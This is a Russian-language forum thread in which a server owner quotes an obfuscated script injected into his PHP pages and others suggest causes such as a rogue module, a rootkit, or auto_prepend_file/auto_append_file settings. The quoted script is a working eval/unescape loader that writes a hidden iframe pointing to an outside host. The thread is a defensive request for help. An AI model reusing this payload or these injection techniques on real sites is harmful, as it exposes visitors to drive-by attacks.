Взломан dedicated cервер

tolyan tolyanov

Guest

Это нравится:0 Да/0 Нет

08.10.2009 20:31:23

Простейший скрипт <? phpinfo(); ?>
Когда вызываем его в браузере внизу страницы отображается вот такая вставка:

Цитата
<script>var ovd=eval,raQ=unescape;ovd(raQ(".64.6f.63.75.6d.65.6e.74.2e.77.72.69.74.65.28.22.3c.69.66.72.61.6d.65.20.73.72.63.3d.27.68.74.74.70.73.3a.2f.2f.6e.63.63.63.6e.6e.6e.63.2e.63.6e.2f.69.6d.67.2f.69.6e.2e.70.68.70.27.3e.3c.2f.69.66.72.61.6d.65.3e.22.29.3b".replace(/[\+.]/g,"%")));</script>

И внизу страницы фрейма с незагруженной страницей. Ломится куда то типа cnnncccn.cn
Что это и как лечить?

.cens

Guest

Это нравится:0 Да/0 Нет

15.10.2009 15:41:45

Вероятно подгружается расширение mod_php через php.ini, проверьте там.
Есть вероятность, что создаётся модуль для вебсервера, проверьте настройки вебсервера на предмет посторонних загружаемых модулей.

В любом случае, если злоумышленники смогли покрутить настройки php или вебсервера, значит права у них достаточно высокие, и я бы в первую очередь проверил систему на руткиты. Ибо встроить такую надстройку можно даже перехватив syscall read()...

всё плохо!

Scipio Guest	#3 Это нравится:0 Да/0 Нет 29.10.2009 04:34:57 ну это можно сделать и через .htaccess c помощью php_value auto_prepend_file и php_value auto_append_file, если это так, то не факт что взломщик получил высокие права в системе. Гораздо хуже если значения auto_append_file и auto_prepend_file изменены в php.ini как сказано выше

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?